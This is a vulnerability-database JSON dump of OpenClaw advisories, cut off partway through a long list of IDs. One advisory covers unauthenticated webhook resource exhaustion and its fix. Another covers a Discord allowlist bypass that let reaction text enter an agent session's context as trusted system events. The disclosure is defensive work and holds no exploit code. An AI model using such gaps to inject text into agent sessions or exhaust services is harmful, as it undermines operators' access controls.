`651dc7450b68a5396a009db78ef9382633707ead`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- 
extensions/voice-call/src/webhook.ts now enforces header gating and shared pre-auth body caps before reading attacker-controlled request bodies.\n- extensions/voice-call/src/webhook.test.ts ships regression coverage for missing-signature, oversize, and timeout pre-auth webhook cases.\n\nOpenClaw thanks @SEORY0 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35626","reference_id":"","reference_type":"","scores":[{"value":"0.00124","scoring_system":"epss","scoring_elements":"0.3119","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00124","scoring_system":"epss","scoring_elements":"0.31121","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00124","scoring_system":"epss","scoring_elements":"0.31157","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35626"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44
f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/"}],"url":"https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35626","reference_id":"","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"
generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35626"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T03:08:51Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook"},{"reference_url":"https://github.com/advisories/GHSA-rm59-992w-x2mv","reference_id":"GHSA-rm59-992w-x2mv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rm59-992w-x2mv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"
},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"
},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"
},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"
},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"
},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35626","GHSA-rm59-992w-x2mv"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5s6h-u8x6-myfk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91798?format=json","vulnerability_id":"VCID-5u41-c7kc-u7fe","summary":"OpenClaw: Discord guild reaction ingress could bypass users and roles allowlists\n## Summary\nIn affected versions of `openclaw`, Discord reaction ingestion for guild channels did not enforce the same member users and roles allowlist checks used for normal inbound guild messages. A non-allowlisted guild member could still trigger reaction events that were accepted and queued as trusted system events for the target session.\n\n## Impact\nThis is an authorization bypass in the Discord allowlist path. Reaction text could be injected into downstream session context even when the reacting guild member was not permitted by the configured users or roles allowlist.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.3.11`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe reaction ingress authorization path enforced DM, group, guild, and channel policy checks, but it did not apply the member-level users and roles allowlist gate that normal guild-message preflight uses. Accepted reactions were then enqueued as trusted system events for the routed session.\n\n## Fix\nOpenClaw now applies the same users and roles allowlist enforcement to guild reaction ingress that it already applies to normal inbound guild messages. 
The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9vvh-2768-c8vp","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9vvh-2768-c8vp"},{"reference_url":"https://github.com/advisories/GHSA-9vvh-2768-c8vp","reference_id":"GHSA-9vvh-2768-c8vp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9vvh-2768-c8vp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-
1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-
73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-
cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-